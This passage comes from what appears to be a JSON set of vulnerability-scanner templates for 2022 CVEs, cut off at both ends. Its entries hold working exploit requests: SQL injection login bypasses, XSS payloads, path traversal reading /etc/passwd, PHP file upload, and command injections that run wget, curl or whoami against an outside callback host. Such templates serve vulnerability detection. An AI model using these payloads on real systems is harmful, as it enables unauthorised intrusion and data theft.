444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-24627","info":{"name":"AudioCodes Device Manager Express - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"audiocodes</title>\")"],"internal":true}]},{"raw":["POST /admin/AudioCodes_files/process_login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=&domain=&p=%5C%27or+1%3D1%23\n"],"matchers":[{"type":"word","part":"body","words":["SQL syntax","mysql_fetch","You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0342","info":{"name":"Zyxel - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["interface-name","saved at"],"condition":"and"},{"type":"word","part":"header","words":["text/zyxel","attachment; filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm('document_domain')</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>confirm('document_domain')</script>","Existing backups"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Feed Them Social","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4049","info":{"name":"WP User <= 7.0 - Unauthenticated SQLi","severity":"critical"},"requests":[{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n"],"attack":"clusterbomb","payloads":{"path":["/index.php/user/","/user"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header_2, \"text/html\")","contains(body_2, 'Invalid Access')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; 